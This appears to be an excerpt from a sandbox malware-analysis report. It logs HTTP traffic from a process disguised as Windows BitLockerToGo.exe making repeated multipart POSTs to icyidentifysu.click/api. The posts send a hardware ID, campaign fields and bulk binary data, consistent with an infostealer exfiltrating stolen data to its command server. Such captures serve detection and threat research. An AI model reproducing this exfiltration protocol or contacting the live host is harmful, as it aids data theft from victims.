                                                                                  2024-12-24 01:56:36 UTC12800OUTData Raw: 2d 2d 4e 33 57 59 31 59 48 52 59 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 4e 33 57 59 31 59 48 52 59 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 33 57 59 31 59 48 52 59 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 0d 0a 2d 2d 4e 33 57 59 31 59 48 52 59 44
                                                                                  Data Ascii: --N3WY1YHRYDYContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--N3WY1YHRYDYContent-Disposition: form-data; name="pid"2--N3WY1YHRYDYContent-Disposition: form-data; name="lid"LPnhqo--iycpjnafscfz--N3WY1YHRYD
                                                                                  2024-12-24 01:56:37 UTC1131INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=ql5a99gjksfb1811mrdf97tfcb; expires=Fri, 18 Apr 2025 19:43:16 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSg2av0U1i3ZcWuabVi6Un7A2yHgC6XZkXQCLbdhXZW1ENzsYMDlkiF4Kvc%2Bn8TKUzr0zJlMx4BeUeStsCZXM6U62v5v11ju7Hnuy7s0%2Byi9P8dNZPRi4UtHuWqg%2Fq3IdKOwdmPF"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cf9d1def943ac-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1632&rtt_var=676&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2851&recv_bytes=13736&delivery_rate=1789215&cwnd=181&unsent_bytes=0&cid=26cde17b9a0debe9&ts=905&x=0"
                                                                                  2024-12-24 01:56:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-24 01:56:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549748104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:39 UTC281OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=J8WBJ6Q0JD8R2E
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15060
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:39 UTC15060OUTData Raw: 2d 2d 4a 38 57 42 4a 36 51 30 4a 44 38 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 4a 38 57 42 4a 36 51 30 4a 44 38 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 38 57 42 4a 36 51 30 4a 44 38 52 32 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 0d 0a 2d 2d 4a
                                                                                  Data Ascii: --J8WBJ6Q0JD8R2EContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--J8WBJ6Q0JD8R2EContent-Disposition: form-data; name="pid"2--J8WBJ6Q0JD8R2EContent-Disposition: form-data; name="lid"LPnhqo--iycpjnafscfz--J
                                                                                  2024-12-24 01:56:42 UTC1128INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=mds9a06828fm4i1jiio6cnjgv5; expires=Fri, 18 Apr 2025 19:43:20 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJ03MU0AQEXvRg7UETlddJFBZiT5YdhH4zWvumG9qL0ZszM9M1CjIj%2FS3wRSCiHlFi5Ne8lJGoCn4HK3ZtfzrBBCPUcGf%2BGlmB0pC8VkRzoH4MkyuMgwpDbnXNMcEU64DtzrjucN"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cf9e23d2e7d1a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1773&rtt_var=686&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2850&recv_bytes=15999&delivery_rate=1572428&cwnd=179&unsent_bytes=0&cid=89390947c225f14b&ts=2872&x=0"
                                                                                  2024-12-24 01:56:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-24 01:56:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549759104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:43 UTC285OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=B441WSEU0FABEAHWCE
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20574
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:43 UTC15331OUTData Raw: 2d 2d 42 34 34 31 57 53 45 55 30 46 41 42 45 41 48 57 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 42 34 34 31 57 53 45 55 30 46 41 42 45 41 48 57 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 34 34 31 57 53 45 55 30 46 41 42 45 41 48 57 43 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a
                                                                                  Data Ascii: --B441WSEU0FABEAHWCEContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--B441WSEU0FABEAHWCEContent-Disposition: form-data; name="pid"3--B441WSEU0FABEAHWCEContent-Disposition: form-data; name="lid"LPnhqo--iycpj
                                                                                  2024-12-24 01:56:43 UTC5243OUTData Raw: 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: BZ>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                  2024-12-24 01:56:44 UTC1134INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=kue3lgiojah014o70ni7op7bcd; expires=Fri, 18 Apr 2025 19:43:23 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cq8vHx62CkuU1BmDnNVVfRlnbwUhIjcwJ%2BB8VZMxwL9j%2Bm8Fy5xw7xuJOOnAKua7yB4nJgXBfAgb3BMwWy3dI8HzXkTOSoxT5kfZJLQfvmTF2Otg%2BUdWlHexq%2FiRwjlp%2FlxJtZ9D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cf9fd2c944334-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1610&rtt_var=835&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2852&recv_bytes=21539&delivery_rate=1150512&cwnd=224&unsent_bytes=0&cid=5d8340cd3eb747ab&ts=1259&x=0"
                                                                                  2024-12-24 01:56:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-24 01:56:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549765104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:46 UTC283OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=0OLTCBLHL669ZO1XS
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1251
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:46 UTC1251OUTData Raw: 2d 2d 30 4f 4c 54 43 42 4c 48 4c 36 36 39 5a 4f 31 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 30 4f 4c 54 43 42 4c 48 4c 36 36 39 5a 4f 31 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 4f 4c 54 43 42 4c 48 4c 36 36 39 5a 4f 31 58 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66
                                                                                  Data Ascii: --0OLTCBLHL669ZO1XSContent-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--0OLTCBLHL669ZO1XSContent-Disposition: form-data; name="pid"1--0OLTCBLHL669ZO1XSContent-Disposition: form-data; name="lid"LPnhqo--iycpjnaf
                                                                                  2024-12-24 01:56:47 UTC1134INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=vdq6timams24u638mm2gvj2862; expires=Fri, 18 Apr 2025 19:43:25 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BPzDgpIslSGgMkIhsvqLhAvG5wEwC2J8rNmO%2FCcnIjA21Z51FN5ZNw6%2Btv8epcmmE2jsfzqXj1QoD0DY2UDdjG2%2Bcuwrc%2FLXyeHk53Wk567Z42%2BsOkZnspoUcD%2BjBiyupOcL9x9"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cfa0eeb6d4414-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1623&rtt_var=615&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=2170&delivery_rate=1799137&cwnd=172&unsent_bytes=0&cid=c1c4d6a6922ab232&ts=818&x=0"
                                                                                  2024-12-24 01:56:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-24 01:56:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549771104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:48 UTC283OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=E05V38MADA0V3M1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 592557
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 2d 2d 45 30 35 56 33 38 4d 41 44 41 30 56 33 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37 0d 0a 2d 2d 45 30 35 56 33 38 4d 41 44 41 30 56 33 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 30 35 56 33 38 4d 41 44 41 30 56 33 4d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 0d 0a
                                                                                  Data Ascii: --E05V38MADA0V3M1Content-Disposition: form-data; name="hwid"87C71F54802818CB0859257F8C965717--E05V38MADA0V3M1Content-Disposition: form-data; name="pid"1--E05V38MADA0V3M1Content-Disposition: form-data; name="lid"LPnhqo--iycpjnafscfz
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 0e d3 a9 46 b8 7d 18 16 10 5d 79 e4 ef 92 bf a4 b4 78 92 a3 a2 1c 2c 08 fc 2c e2 9a 03 04 c0 1b 21 3b b5 5a 70 3d c4 e9 c0 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e
                                                                                  Data Ascii: F}]yx,,!;Zp=um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYe*d7${~)7-uy%_`Mj>8^Ii9*H;(!MN
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 0e 3f ff 53 3c fa 66 99 dd 76 19 49 51 22 fd 13 e5 fb 65 d3 d8 40 83 b2 d7 f4 ce b2 5f f7 df 87 fb 65 c7 c5 c6 6e 68 9d 47 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b
                                                                                  Data Ascii: ?S<fvIQ"e@_enhG> s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: d1 f1 30 7c b4 57 ec 9f fe ee 61 a9 f2 1c 15 8a e0 e1 e7 b0 93 b2 4a d7 07 ed 7a 4a 68 27 60 59 95 6b 62 fc 56 75 47 cc 0c 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd
                                                                                  Data Ascii: 0|WaJzJh'`YkbVuG*evL!`Zxm'VT>TG.<;|d0%2b{A-=dSOS8+LWJV*S|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd|kY
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 25 ab ab 22 6a ed 9d bc 1e a3 d3 43 3c e7 ae c9 a5 9c 54 e8 e6 cb 4b 12 5e 68 6b 8c 9a e4 f7 a3 37 e4 24 13 bf e3 d0 40 4b 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7
                                                                                  Data Ascii: %"jC<TK^hk7$@KB06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 96 e0 c7 f6 b8 83 8c b8 dc 57 d9 d5 30 85 f8 8a f5 b0 13 8e 9f bd 61 ab 4f 7b 13 42 bd c8 5f 2d 04 67 92 d8 bc fa c0 27 b7 a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd
                                                                                  Data Ascii: W0aO{B_-g'oBRohu.-~ZMe|TY=AHk>6!rd=FrGpSXU&*e(&D[}|A+IsFJ?6LAjbH<["\<4?(wV~R]pbY
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 99 4d da 0e f1 d2 ea 5d 2b eb 5d 89 9a cc 13 88 e8 93 68 2a 08 eb 71 a1 56 33 2b 98 71 4b c7 ee 89 ea c6 dd db ff b9 e0 91 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34
                                                                                  Data Ascii: M]+]h*qV3+qK8_5V,{*0<b* 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~4
